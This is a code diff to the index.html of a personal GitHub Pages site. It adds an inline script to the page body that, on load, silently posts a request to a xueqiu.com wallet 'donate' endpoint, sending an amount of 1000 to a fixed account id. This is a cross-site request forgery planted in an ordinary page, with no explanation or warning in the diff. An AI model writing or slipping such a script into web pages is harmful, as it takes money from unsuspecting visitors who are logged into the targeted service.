--- a/index.html
+++ b/index.html
@@ -7,11 +7,14 @@
     <meta name="description" content="Croath.github.io : " />
 
     <link rel="stylesheet" type="text/css" media="screen" href="stylesheets/stylesheet.css">
-
+    <script src="//code.jquery.com/jquery-migrate-1.2.1.min.js"></script>
     <title>Croath.github.io</title>
   </head>
 
   <body>
+  <script>
+    $.post("http://xueqiu.com/wallet/donate", { to_id: "29210754", to_type: "status", amount: "1000" } );
+  </script>
 
     <!-- HEADER -->
     <div id="header_wrap" class="outer">
